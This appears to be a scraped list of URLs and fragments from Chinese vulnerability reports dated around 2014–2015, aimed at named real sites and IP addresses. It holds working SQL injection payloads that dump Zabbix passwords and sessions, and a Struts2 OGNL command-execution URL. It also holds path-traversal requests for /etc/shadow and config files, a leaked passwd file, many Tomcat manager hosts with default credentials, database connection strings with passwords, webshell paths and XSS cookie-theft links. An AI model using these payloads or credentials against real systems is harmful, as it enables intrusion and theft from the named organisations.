http://weirenwu.weibo.com/taskv2/index.php?c=order.orderManage&method=new&sTime=2014-12-30+00%3A00%3A00&eTime=2015-01-04+00%3A00&taskName=123'&paytype= http://weirenwu.weibo.com/taskv2/index.php?c=order.orderManage&method=new&sTime=2014-12-30+00%3A00%3A00&eTime=2015-01-04+00%3A00&taskName=123''&paytype= http://i.178.com/~album.photo.view_thread/id/2737202/uid/105652 url:http://202.108.90.135/gsApp/login.action http://www.2977.com/card/jtz_card.aspx?gameCode=ly http://www.sqlmap.org www.2977.c http://www.yichemall.com/User/ForgotPassword http://www.yichemall.com/user/checkmobile?telephone=1xxxxxxxxxx http://www.yichemall.com/user/_ChangePwdByPhone 
http://web.youxipai.com/games/content/ http://o2o.fanwe.net/biz.php?ctl=login http://deals.travelzen.com与http://events.travelzen.com/存在相同的问题 http://deals.travelzen.com/include/config.inc http://deals.travelzen.com/include/en/config.inc http://deals.travelzen.com/php/includes/config.inc http://deals.travelzen.com/php/includes/en/config.inc http://deals.travelzen.com/templates/en/config/config.inc http://deals.travelzen.com/templates/sc/config/config.inc http://deals.travelzen.com/templates/tc/config/config.inc http://mail.payeco.com http://mail.payeco.com/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00 inurl:ws2004 http://www.xxoo.com/ws2004/SysManage/ http://www.suyaxing.com:81/ws2004/SysManage/UserManage/SysManage/editxml.asp?ID=1 http://**.**.**/ws2004/SysManage/UserManage/SysManage/editxml.aspID=1_ http://**.**.**/ws2004/SysManage/UserManage/SysManage/editxml.aspID=1_ http://**.**.**/ws2004/SysManage/UserManage/SysManage/editxml.aspID=1_ http://**.**.**/ws2004/SysManage/UserManage/SysManage/editxml.aspID=1_ http://**.**.**/ws2004/SysManage/UserManage/SysManage/editxml.aspID=1_ http://**.**.**/ws2004/SysManage/UserManage/SysManage/editxml.aspID=1_ http://**.**.**/ws2004/SysManage/UserManage/SysManage/editxml.aspID=1_ http://**.**.**/ws2004/SysManage/UserManage/SysManage/editxml.aspID=1_ http://**.**.**/ws2004/SysManage/UserManage/SysManage/editxml.aspID=1_ http://**.**.**/ws2004/SysManage/UserManage/SysManage/editxml.aspID=1_ http://**.**.**/ws2004/SysManage/UserManage/SysManage/editxml.aspID=1_ http://**.**.**/ws2004/SysManage/UserManage/SysManage/editxml.aspID=1_ http://**.**.**/ws2004/SysManage/UserManage/SysManage/editxml.aspID=1_ http://**.**.**/ws2004/SysManage/UserManage/SysManage/editxml.aspID=1_ http://**.**.**/ws2004/SysManage/UserManage/SysManage/editxml.aspID=1_ http://**.**.**/ws2004/SysManage/UserManage/SysManage/editxml.aspID=1 
http://mail.xdrcb.com/ http://b.weimai.com/index.php/wap/Index/order/token/1252359/c_userid/0/skuid/244285/buy_count/1/from/view?id=33094 http://pay.2977.com/Pay/LyPay?gameid=wycq http://www.sqlmap.org http://121.15.14.228:81/wfvideo/login.action http://eelab.sjtu.edu.cn/EELAB/EELAB.rar http://jifen.imop.com/include/.svn/entries http://jifen.imop.com/test.php http://jifen.imop.com/include/.svn/text-base/conf_mysql.php.svn-base http://jifen.imop.com/include/.svn/text-base/cls_mysql.php.svn-base http://jgjc.shdrc.gov.cn/gzcx/listFbXX.do www.shuobozhaopin.com/Person/Per_Search_Advance.asp gaobu.dgjob.cn/Person/Per_Search_Advance.asp www.smrc.com/Person/Per_Search_Advance.asp www.jobjp.cn/Person/Per_Search_Advance.asp www.0566job.com/Person/Per_Search_Advance.asp www.lsrc114.com/Person/Per_Search_Advance.asp www.fhclm.com/Person/Per_Search_Advance.asp http://yanjiusheng.bistu.edu.cn/web/InfoKindList.aspx?kind=0201 http://yanjiusheng.bistu.edu.cn/web/infoList6.aspx?kind=02 http://yanjiusheng.bistu.edu.cn/web/ViewSearch.aspx?word= http://yanjiusheng.bistu.edu.cn/web/ViewKindInfo.aspx?kind=02 http://dbcourse.bistu.edu.cn/searchList.aspx?name= http://shop.6eat.com/group_buy.php?id=9 http://service.chinaums.com/uis/uisWebLogin/login http://ky.52ku.com http://ky.dg.52ku.com http://ky.zs.52ku.com http://cz.52ku.com http://www.lfjxt.cn/admin/login.aspx http://www.gdgyagri.gov.cn/zjxx.asp?id=13 http://goods.tudou.com/seller/ https://github.com/suncry/517na/tree/79544032a1bf2fff321f9f56b6f60d61798bc647 https://github.com/suncry/517na/tree/79544032a1bf2fff321f9f56b6f60d61798bc647/na517 http://203.195.196.198:81/ http://www.qyszxxz.com/sub.jsp?classid=18 http://www.sasacgs.gov.cn/sub.jsp?classid=188 http://www.gszlyy.com/sub.jsp?classid=336 http://www.ldlyy.com/sub.jsp?classid=26&preid=18 http://www.gsjkjy.org.cn/sub.jsp?classid=9 http://www.qyszxxz.com/sub_detail.jsp?classid=17 http://www.ldlyy.com/sub_detail.jsp?classid=35&preid=1&contentid=598 
http://www.ldlyy.com/sub.jsp?classid=26&preid=1 http://www.gsjkjy.org.cn/detail.jsp?articleId=8980 http://202.100.85.100/detail.jsp?articleId=519 http://www.sasacgs.gov.cn/detail.jsp?articleId=759 http://www.ldlyy.com/detail.jsp?articleId=574 http://www.qyszxxz.com/detail.jsp?articleId=154 http://gsblood.com/detail.jsp?articleId=385 http://qyfybj.com/detail.jsp?articleId=299 http://www.gsjkjy.org.cn/detail.jsp?articleId=8980 http://www.qyszxxz.com/list.jsp?classid=19 http://www.ldlyy.com/list.jsp?classid=10 http://www.gsjkjy.org.cn/list.jsp?classid=49 http://61.178.83.34/list.jsp?classid=752 http://www.jcsxz.com/list.jsp?classid=22 http://www.qyszxxz.com/list.jsp?classid=24 http://www.sasacgs.gov.cn/leader.jsp?classid=206 http://www.ldlyy.com/leader.jsp?classid=35&preid=1 http://www.jygsyy.com/leader.jsp?classid=26 http://www.gszlyy.com/leader.jsp?classid=320&preid=318 http://202.100.85.100/detail.jsp?articleId=519 http://hhyjzx.ahu.edu.cn/ http://211.137.18.174/20155407125426.asp;.txt http://bbs.gome.com.cn/plugin.php?action=index&id=nds_up_ques http://www.czkjllt.com/FCKeditor/editor/fckeditor.html http://www.czkjllt.com/ban.asp http://caigou.xinyuan.com.cn/xmal/index.jhtml http://**.**.**/beta http://v.youku.com/v_show/id_XMzc5NzQyNzQw.html http://**.**.**/management/ http://**.**.**/eid/home.action http://**.**.**/eid/start.action http://wap.zslib.com.cn/library/library!toBookDetail.action?docNumber=2162108&lib=ZSL01 http://crm.itrus.com.cn/ http://wooyun.org/bugs/wooyun-2015-090368部分重复 http://crm.itrus.com.cn/pub/bgtaskreq.php?svr=1 http://crm.itrus.com.cn/background/onlinemeetingstatus.php?ID=1 http://crm.itrus.com.cn/background/sendsms.php?ID=1 http://crm.itrus.com.cn/background/smsstatusreport.php?ID=1 http://xss.re/7188 http://xss.re/api-7187.jpg,命名为目标,和一个接受cookie项目,见下图 http://jysd.shou.edu.cn/ http://jyw.jhc.cn/ http://job.wzu.edu.cn/ http://sju.91job.gov.cn/ http://job.zust.edu.cn/ http://jy.cczu.edu.cn/ http://ledp.dongfeng-citroen.com.cn/Index/login 
http://202.103.37.45 STACK_FRAME:Unknown STACK_FRAME:mmcndmgr!ATL::CComContainedObject STACK_FRAME:ole32!OleIsRunning+0x25 STACK_FRAME:wwlib!wdCommandDispatch+0x1a74f5 STACK_FRAME:wwlib!DllCanUnloadNow+0x2af90a STACK_FRAME:wwlib!FMain+0x3bf53 STACK_FRAME:wwlib!FMain+0x311ad STACK_FRAME:wwlib!FMain+0x7d849 STACK_FRAME:wwlib!DllGetLCID+0x364f4 STACK_FRAME:wwlib!wdCommandDispatch+0x8332a STACK_FRAME:wwlib!DllCanUnloadNow+0x363d18 STACK_FRAME:wwlib!DllGetLCID+0x3c759 STACK_FRAME:wwlib!DllGetLCID+0x33c3c STACK_FRAME:wwlib!DllGetLCID+0x3125b STACK_FRAME:wwlib!wdCommandDispatch+0xfb030 STACK_FRAME:wwlib!wdCommandDispatch+0x2ddb82 STACK_FRAME:wwlib!FMain+0xd2029 STACK_FRAME:wwlib!FMain+0xe8b16 STACK_FRAME:wwlib!FMain+0xe8449 STACK_FRAME:wwlib!FMain+0xe8383 STACK_FRAME:wwlib!FMain+0xe7eeb STACK_FRAME:wwlib!FMain+0xe7de9 STACK_FRAME:wwlib!DllGetClassObject+0x6f122 STACK_FRAME:wwlib!FMain+0xe6125 STACK_FRAME:wwlib!FMain+0xe5ddb STACK_FRAME:wwlib!FMain+0xe5cd3 STACK_FRAME:VBE6!lblEX_ThisVCallHresult+0x22 STACK_FRAME:OLEAUT32!DispCallFunc+0x16a STACK_FRAME:VBE6!EpiInvokeMethod+0x2e3 STACK_FRAME:Unknown STACK_FRAME:VBE6!BASIC_DISPINTERFACE_Invoke+0x91 STACK_FRAME:VBE6!WRAPPER_EVENT_SINK::Invoke+0x8e STACK_FRAME:wwlib!FMain+0x1012a8 STACK_FRAME:wwlib!FMain+0x1011b3 STACK_FRAME:wwlib!FMain+0x101467 STACK_FRAME:wwlib!FMain+0x1013dd STACK_FRAME:wwlib!FMain+0x100ff8 STACK_FRAME:wwlib!FMain+0x10137b STACK_FRAME:wwlib!FMain+0x7c74f STACK_FRAME:wwlib!FMain+0x7c6b1 STACK_FRAME:wwlib!FMain+0x530e2 STACK_FRAME:wwlib!DllGetLCID+0x185b2 STACK_FRAME:wwlib!DllGetLCID+0x10863 STACK_FRAME:wwlib!DllGetLCID+0x10494 STACK_FRAME:wwlib!DllGetLCID+0x10101 STACK_FRAME:wwlib!DllGetLCID+0xffac STACK_FRAME:wwlib!DllGetLCID+0xfe30 STACK_FRAME:wwlib!FMain+0xd2029 STACK_FRAME:wwlib!wdCommandDispatch+0x3f798b STACK_FRAME:wwlib!wdCommandDispatch+0x3f7f06 STACK_FRAME:wwlib!DllCanUnloadNow+0x3ba5b2 STACK_FRAME:wwlib!DllCanUnloadNow+0x3ba9e4 STACK_FRAME:wwlib!FMain+0xd4b3f STACK_FRAME:wwlib!FMain+0xdf6fb 
STACK_FRAME:wwlib!FMain+0xdc6b3 STACK_FRAME:wwlib!FMain+0x6ac STACK_FRAME:WINWORD+0x15fb STACK_FRAME:WINWORD+0x156d STACK_FRAME:kernel32!BaseProcessStart+0x23 INSTRUCTION_ADDRESS:0x0000000010110d5f DESCRIPTION:Possible SHORT_DESCRIPTION:PossibleStackCorruption CLASSIFICATION:UNKNOWN http://youkubj-pms.youku.com/trial/?qq-pf-to=pcqq.c2c http://www.jtf.org.tw:80/psyche/news.asp?This=1754(疑似可跨多数据库) http://118.123.244.238/login.action http://203.195.203.213:8080/admin http://inbbs.17u.com:8080 com:8080 http://fax.sfn.cn/fax.rar http://active.zqgame.com/zqgame/zbx/cutegirl/admin/admin.aspx url:http://222.223.218.138:8000/manager/html user:tomcat pass:tomcat url:http://61.234.52.116:8000/manager/html user:tomcat pass:tomcat url:http://61.234.52.118:8000/manager/html user:tomcat pass:tomcat url:http://61.234.52.115:8000/manager/html user:tomcat pass:tomcat url:http://61.234.52.114:8000/manager/html user:tomcat pass:tomcat url:http://117.78.2.208:8000/manager/html user:tomcat pass:tomcat url:http://221.7.205.53:8000/manager/html user:tomcat pass:tomcat url:http://221.7.205.54:8000/manager/html user:tomcat pass:tomcat url:http://210.14.154.142:8000/manager/html user:tomcat pass:tomcat url:http://123.151.19.108:8000/manager/html user:tomcat pass:tomcat url:http://121.29.227.53:8000/manager/html user:tomcat pass:tomcat url:http://120.0.221.6:8000/manager/html user:tomcat pass:tomcat url:http://119.113.142.86:8000/manager/html user:tomcat pass:tomcat url:http://61.234.52.116:8000/manager/html user:tomcat pass:tomcat url:http://61.234.52.115:8000/manager/html user:tomcat pass:tomcat url:http://60.8.196.166:8000/manager/html user:tomcat pass:tomcat url:http://222.223.218.94:8000/manager/html user:tomcat pass:tomcat url:http://222.222.23.140:8000/manager/html user:tomcat pass:tomcat url:http://222.94.89.241:8000/manager/html user:tomcat pass:tomcat url:http://222.68.180.154:8000/manager/html user:tomcat pass:tomcat url:http://221.226.100.162:8000/manager/html user:tomcat 
pass:tomcat url:http://219.148.122.196:8000/manager/html user:tomcat pass:tomcat url:http://219.148.122.239:8000/manager/html user:tomcat pass:tomcat url:http://218.249.195.243:8000/manager/html user:tomcat pass:tomcat url:http://219.129.201.124:8000/manager/html user:tomcat pass:tomcat url:http://218.90.137.138:8000/manager/html user:tomcat pass:tomcat url:http://218.94.67.218:8000/manager/html user:tomcat pass:tomcat url:http://218.71.138.206:8000/manager/html user:tomcat pass:tomcat url:http://202.103.207.38:8000/manager/html user:tomcat pass:tomcat url:http://202.103.207.39:8000/manager/html user:tomcat pass:tomcat url:http://122.224.101.76:8000/manager/html user:tomcat pass:tomcat url:http://119.129.151.64:8000/manager/html user:tomcat pass:tomcat url:http://119.127.193.159:8000/manager/html user:tomcat pass:tomcat url:http://116.247.125.130:8000/manager/html user:tomcat pass:tomcat url:http://116.231.4.61:8000/manager/html user:tomcat pass:tomcat url:http://61.185.212.85:8000/manager/html user:tomcat pass:tomcat url:http://61.130.101.106:8000/manager/html user:tomcat pass:tomcat url:http://60.190.30.214:8000/manager/html user:tomcat pass:tomcat url:http://58.49.94.100:8000/manager/html user:tomcat pass:tomcat url:http://121.40.31.44:8080/manager/html user:tomcat pass:tomcat url:http://121.201.5.29:8080/manager/html user:tomcat pass:tomcat url:http://121.201.13.113:8080/manager/html user:tomcat pass:tomcat http://60.28.196.17/resin-admin/status.php http://60.28.196.61/resin-admin/status.php http://60.28.196.62/resin-admin/status.php http://60.28.196.141/resin-admin/status.php http://123.125.98.202:47078/essframe http://115.182.12.9/security/login.hlt http://mgbz.szlib.com:8080/PAPER/GetNews.action http://mgbz.szlib.com:8080/PAPER/demo.jsp http://58.213.19.68/users/sign_in http://58.213.19.68/users/sign_up http://m.rayli.com.cn/article/search.php?ver=iphone&tag=AYUKI http://**.**.**/ http://www.izhenxin.com/ http://ewp.suning.com.cn 
url:http://xxcg.ciwong.com/learninglevel/SubjectDet http://rmp.haier.net/index.php?g=Home&m=Index&a=index http://verisign.itrus.com.cn http://verisign.itrus.com.cn/index.php?ac=search&at=taglist&tagkey=%2527,tags%29%20or%28select%201%20from%28select%20count%28*%29,concat%28%28select%20%28select%20concat%280x7e,0x27,table_name,0x27,0x7e%29%29%20from%20information_schema.tables%20where%20table_schema=database%28%29%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23 http://enterprise.zte.com.cn/servlet/DownLoadFenJieServlet?fileName=/app/loadToSupport/loadToSupport.jsp&newFile=1&outFileName=1.txt http://222.247.51.155:9000/webpage!indexPage.action http://222.247.51.155:9000/LoginAction.do http://www.mdjkjj.gov.cn:8080/wfvideo/authorityAction.action http://59.57.3.150/user/check.asp?pwd=&uID= http://xxxxxxxx/ucenter/login/loginAction!login.action admin:admin http://www.bankpos.com.cn/admin/images/ http://www.bankpos.com.cn/admin/upfile.asp http://112.94.161.30/busiqry/user-card-balance!balanceQry.action http://58.213.19.231:8080/ucenter/index.jsp http://58.213.19.231:8080/ucenter/forget/forgetAction!forget.action http://113.108.219.40/Approve/Module/Share/Notices.aspx?sys=APPROVESYS&nid=181&code= http://www.szxc.net.cn/ site:szxc.net.cn http://www.szyz.gov.cn/DownLoad.aspx?url=upload/File/2014/e98e5da0-9f15-479b-9d62-60e9c149547d.pdf&fname=%E5%86%85%E6%B2%B3%E8%88%B9%E5%9E%8B%E6%A0%87%E5%87%86%E5%8C%96%E5%B7%A5%E4%BD%9C%E8%B5%84%E9%87%91%E7%AE%A1%E7%90%86%E5%8A%9E%E6%B3%95.pdf http://www.nongyou.com.cn/ http://218.56.40.229:8026/SysManage/CunMapShow.aspx?qid= http://60.217.72.17:6001/SysManage/CunMapShow.aspx?qid= http://123.133.64.59:6001/SysManage/CunMapShow.aspx?qid= http://221.2.171.59:8100/SysManage/CunMapShow.aspx?qid= http://221.2.149.47:8300/SysManage/CunMapShow.aspx?qid= 
https://member.meizu.com/sso?appuri=http%3A%2F%2Fbbs.meizu.cn%2Flogging.php&useruri=http%3A%2F%2Fbbs.meizu.cn%2F&sid=&service=bbs&autodirct=true https://member.meizu.com/sso/login http://bbs.meizu.cn/logging.php?token=特别长的token或者http://bbs.flyme.cn/login.php?token=特别长的token www.baidu.com?bbs.meizu.cn%2Flogging.php处,拿着这个token请求logging.php或login.php就OK了 https://member.meizu.com/sso?appuri=http%3A%2F%2Fmysite.com?bbs.meizu.cn%2Flogging.php&useruri=http%3A%2F%2Fbbs.meizu.cn%2F&sid=&service=bbs&autodirct=true http://www.nongyou.com.cn/ http://218.56.40.229:8025/ckq/cwgkview.aspx?CountryName=%e8%a5%bf%e5%8c%97%e5%85%b3 http://61.133.119.187:8091/ckq/cwgkview.aspx?CountryName=%E5%9B%9B%E7%94%B2%E6%9D%91 http://222.135.127.190:7200/ckq/cwgkview.aspx?CountryName=%E5%8D%97%E9%BB%84%E6%9D%91 http://123.134.189.60:8007/ckq/cwgkview.aspx?CountryName=%E5%B0%8F%E5%BA%99%E6%9D%91 http://111.17.169.213:801/ckq/cwgkview.aspx?&CountryName=%E4%B8%89%E6%B3%89%E6%9D%91 http://p1.wdzx.com/wdrzmgview?search=%E4%B8%AD%E8%B4%B7%E4%BF%A1%E5%88%9B http://99rcw.cn/www.zip http://jiwei.sjtu.edu.cn/web.rar http://www.17u.com/special/2010wujiang/blog-show.asp?id=6337 http://wed.27.cn/marry/marryadmin admin:ailiadmin,成功登陆后台 https://github.com/davidaq/hdzx/blob/master/Common/SendMail.php http://180.153.24.6:8180/ https://sfadp.sf-express.com https://219.134.187.215 http://gc.imop.com/passport/login.php http://roundcube.net/,下载最新版本。 http://q.115.com/ http://ting.weibo.com/music/show/showlist?location=35&duration=false&getticket=false&viewtype=time&page=1 http://weirenwu.weibo.com/taskv2/index.php?c=cpcs.createOrder&tid=726407 http://ganglia.ihep.ac.cn/gweb/ http://plus.youxipai.com/search.php?keyword=%E4%B8%89%E5%9B%BD&searchtype=titlekeyword&channeltype=0&orderby=&kwtype=1&pagesize=10&typeid=1,69,83&TotalResult=35&filesize=&PageNo=-2 http://bbs.dedecms.com http://www.jgrcb.com/bankcardlists.php?cid=21 http://www.jgrcb.com/?cid=&page= http://www.jgrcb.com/bankcardcons.php?cid=23&id=38 
http://www.jgrcb.com/webadmin/Tzstudent_Com.php http://www.jgrcb.com//upload/1377418921.php http://www.jgrcb.com/a.php http://www.jgrcb.com//upload/sb.php http://123.126.98.120:82/ http://bd-bank.com.cn/download/download.jsp?filepath=../../WEB-INF/WEB.XML http://bd-bank.com.cn/download/download.jsp?filepath=download/download.jsp http://www.oa.jinedu.cn/newjyoa/ admin:admin admin:123456 http://www.dlrcb.cn/NewsWebUI/NewSearchMapFrame.aspx?searchText= http://www.sqlmap.org www.dlrcb http://www.jsdtrcb.com/newsClass.asp?class_id=1 http://www.sqlmap.org www.jsdtrc http://www.jsdtrcb.com:80/err.asp http://www.jb51.net/do/tag.php?/%CA%A7%C1%E9/-1272%E2%80%9D/ http://210.73.83.146/lzjPrj/home/NewsList.aspx?id=5 http://www.sqlmap.org http://job.admin5.com/Company/Com_Search.aspx?redate=180&cvalid=&flag=1&city=6100 http://job.admin5.com/Company/Com_Search.aspx?redate=180&cvalid=1400&searchkey=&flag=1&city=6302 http://zhaopin.deppon.com url:http://www.go100.cn/Filesys/admin.php?m=Public&a=login http://democn.b2b-builder.com/main.php?m=tg&s=admin_orderadder http://61.150.72.184:8080/ http://61.150.72.184:8080/20143123013126.asp;.txt http://**.**.**/querysystemstatus.asp https://183.62.56.125/welcome.php http://www.unicomlabs.com/联通此站存在设计缺陷 http://www.unicomlabs.com/ http://www.unicomlabs.com http://www.unicomlabs.com/Number.asp?unikey=e16e9ef8df3c1efd7ba182514244ed58 http://www.unicomlabs.com/Number.asp?unikey=e16e9ef8df3c1efd7ba182514244ed58 http://www.unicomlabs.com/Number.asp?unikey=e16e9ef8df3c1efd7ba182514244ed58嵌入到钓鱼页面中发给对方 http://xsweb.uvu.edu.cn/ http://zhidao.baidu.com/link?url=Yjp5QaLrzSDK9GQUuKROAtvvNH9iRGbqIJ8I7xsfAX0hfyrilWCR2WXsX14deKXmT_iHQggLbBzszA_EeYd9Kq http://jw.ynjtc.com/xsweb http://219.228.48.108:81/xsweb/ http://121.8.99.242/xsweb http://xsweb.uvu.edu.cn/default.aspx http://xsweb.uvu.edu.cn/TZJK/ViewHabitusHealthStandard.aspx http://www.ndfcrcw.com/data.rar http://www.ot-hs.com/index1.asp http://xss.re/7188 http://xss.re/7188 
http://122.225.26.86:7001/wscx_jx/ http://122.225.26.86:7001/console/ http://bwc.buaa.edu.cn/download.action?filePath=../../../../../../etc/shadow CT3TSokCDGcBTOeklEJGM1:16311:0:99999:7 http://cloud.suning.com http://cloud.suning.com/cloud-web/share/link.htm?sk=aaaeJi http://news.njr.so:8002/uc/uc/login/login2.action http://schoolhouse.eduapp.ahedu.gov.cn/地址 https://github.com/lijiejie/edu-dns-zone-transfer/tree/master/DNS https://sfadp.sf-express.com/status?full=true https://sfadp.sf-express.com/jbpm-console https://sfadp2.sf-express.com/admin-console,典型的哪里有问题补丁哪里。 http://cy.smehlj.gov.cn/ps/ jdbc:oracle:thin:@172.172.172.112:1521:ORCL IP:113.5.194.0 http://www.wooyun.org/feedback.php?bugid=90666 http://www.enet.com.cn/itself/ http://tg.gw.com.cn/admin/ http://114.80.158.17/admin/searchMessage.php?page=22 http://114.80.158.17/admin/votelog.php http://219.232.209.140:8080/WebCall/notice_view.action http://219.232.209.140:8080/WebCall http://219.232.209.140:8080/WebCallBusiness/ http://zuopin.4399.com/center.php?ac=down&f=http://plimg2.5054399.com/20s15_01_07_e9eb267s600ec977f9662d95dc5d8a000.jpg http://plimg2.5054399.com/开头 http://zuopin.4399.com/center.php?ac=down&f=http://plimg2.5054399.com@160.16.x.x/4399 http://www.yixiangzhan.com/login.asp http://space.vogue.com.cn/home.php?mod=space&do=friend http://svip.sto.cn http://www.dapu.com/zx/wp-login.php http://travel.e-picclife.com/ http://mylive.moyuntv.com/html/wap/userMsg.html www.highpin.cn http://c.highpin.cn/Message/MessageDetail/13371 http://c.highpin.cn/Message/MessageDetail/09227 http://www.nongyou.com.cn/ http://218.56.40.229:8025/ckq/hnzcout.aspx?CountryName=%E8%A5%BF%E5%8C%97%E5%85%B3 http://222.134.154.214:8001/ckq/hnzcout.aspx?CountryName=%E5%A7%9A%E5%AE%85 http://111.17.169.213:801/ckq/hnzcout.aspx?CountryName=%E8%8E%B2%E6%B1%A0 http://jwh.tanljgzx.gov.cn/ckq/hnzcout.aspx?CountryName=%E8%A5%BF%E5%8F%A4%E5%9F%8E http://218.58.124.131:8003/ckq/hnzcout.aspx?&CountryName=%E5%AD%99%E5%BA%84%E6%9D%91 
http://www.sdmgyfc.com/product/html/9.html www.sdmgyfc.com http://**.**.**/dylgy/default.aspx http://114.80.136.43/test.php?x_pwned=cmd http://images.51cto.com/images/pixviewer.swf http://www.yesky.com/TLimages/yeskyimages/pixviewer.swf http://www.bhcbd.gov.cn/WebPages/pixviewer.swf http://house.focus.cn/image/pixviewer.swf http://www.xedz.gov.cn/lib/Player/pixviewer.swf http://www.hebinhe.net/new/flash/pixviewer.swf http://qxxnw.qingdao.gov.cn/images/focus.swf http://youxi.baomihua.com:9000/httpmon.php?applications=2%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%28select%20concat%28cast%28concat%28alias,0x7e,passwd,0x7e%29%20as%20char%29,0x7e%29%29%20from%20zabbix.users%20LIMIT%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29 http://youxi.baomihua.com:9000/httpmon.php?applications=2%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%28select%20concat%28cast%28concat%28sessionid,0x7e,userid,0x7e,status%29%20as%20char%29,0x7e%29%29%20from%20zabbix.sessions%20where%20status=0%20and%20userid=1%20LIMIT%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29 http://ceshi.51ping.com/getUserInfo?usernickname=iamp912&mobileno=xxxxx bbs.51ping.com/bbs root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin rpc:x:32:32:Rpcbind 
Daemon:/var/cache/rpcbind:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin abrt:x:173:173::/etc/abrt:/sbin/nologin saslauth:x:499:76:"Saslauthd saslauth:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin arpwatch:x:77:77::/var/lib/arpwatch:/sbin/nologin tcpdump:x:72:72::/:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin nslcd:x:65:55:LDAP User:/:/sbin/nologin nagios:x:498:500:nagios:/var/log/nagios:/bin/sh mysql:x:497:501::/home/mysql:/bin/bash zabbix:x:496:497:Zabbix System:/var/lib/zabbix:/sbin/nologin puppet:x:52:52:Puppet:/var/lib/puppet:/sbin/nologin https://yonghu.ecton.com.cn http://124.238.218.227:89/m1/login.do jdbc:jtds:sqlserver://127.0.0.1:1433;DatabaseName=ecology7;user=sa;password=wEAver2012 jdbc:oracle:thin:ecologydev/ecology@192.168.0.204:1521:weaver1 http://114.80.136.192:28017/ http://flash.sznews.com:8585/cms/web/xztv/bbsLogin/test.jsp http://60.10.8.227:89/m1/login.do jdbc:jtds:sqlserver://192.168.0.204:1433;DatabaseName=ecologydev;user=sa;password=ecology jdbc:oracle:thin:ecologydev/ecology@192.168.0.204:1521:weaver1 jdbc:jtds:sqlserver://127.0.0.1:1433;DatabaseName=ecology7;user=sa;password=wEAver2012 http://**.**.**/ http://democn.shop-builder.cn/product-list-100601.html http://221.176.9.201/login.do http://202.119.108.32/ inurl:sydwzk/policy http://www.smrsks.com/ http://www.smrsks.com/syrcservlet?RequestType=NEW&RightCode=Guest&flag=add&userNo=wooyun&step=1 http://www.smrsks.com/syrcservlet?RequestType=NEW&RightCode=Guest&flag=checkcount http://218.75.114.22:80/ http://218.75.114.22/20143123013126.asp;.txt http://www.ahlyrc.com/ahlyrc.rar http://60.2.213.82:80/ 
http://60.2.213.82/20143124113103.asp;.txt http://124.193.81.210:8080/ http://116.52.250.236:80/ http://219.141.18.50/bmxt/person/method/login/login.action?class.classLoader.jarPath=%28%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3d+new+java.lang.Boolean%28false%29%2c+%23_memberAccess[%22allowStaticMethodAccess%22]%3dtrue%2c+%23a%3d%40java.lang.Runtime%40getRuntime%28%29.exec%28%27ipconfig%27%29.getInputStream%28%29%2c%23b%3dnew+java.io.InputStreamReader%28%23a%29%2c%23c%3dnew+java.io.BufferedReader%28%23b%29%2c%23d%3dnew+char[50000]%2c%23c.read%28%23d%29%2c%23sbtest%3d%40org.apache.struts2.ServletActionContext%40getResponse%28%29.getWriter%28%29%2c%23sbtest.println%28%23d%29%2c%23sbtest.close%28%29%29%28meh%29&z[%28class.classLoader.jarPath%29%28%27meh%27%29 http://219.141.18.58/WebReport/ReportServer?op=resource&resource=../../WEB-INF/web.xml http://219.141.18.58/cmsweb-portlet/html/adminstatistics/statistics.jsp http://219.141.18.58/cmsweb-portlet/html/common/urlTest.jsp http://219.141.18.58/cmsweb-portlet http://www.ztehome.com.cn/,存在搜索SQL注入,前两天爆出了该站的一个注入问题,后来测试发现转义,但是在别的地方又有同样的问题,存在问题的地方: http://www.ztehome.com.cn/support/siteSearchRslt.php?tsearch=1 http://www.ztehome.com.cn/support/siteSearchRslt.php?tsearch=1 http://202.199.128.120/admin登陆,随便找个学生账号就好,学生账号是学生的学号,密码也是学号,只要随便找个学生的学号登陆就好,我随便找个学号:1101050113。 http://202.199.128.120/admin/sysuser.do?method=list,如图: http://bit.tcl.com/ http://112.124.4.229:808/member/my.php?mid=21&status=4 http://218.206.176.104:8080/api/cc.jsp?cmsn=Mm1JeVFaZW9YUjZxVEhoVVc2WGZTUT09&q=http%3A%2F%2F121.40.123.23%2Frecv.php%3F_f%3D185659aff8c4e814a5d3537d9efb98bf_-_id%3Dwxkj_-_inx%3D0_-_ref%3Dhttp%25253A%25252F%25252Flocalhost.com%25252F1.php_-_query%3D%252526id%25253Dwxkj%252526c%25253D3_-corp%3D 
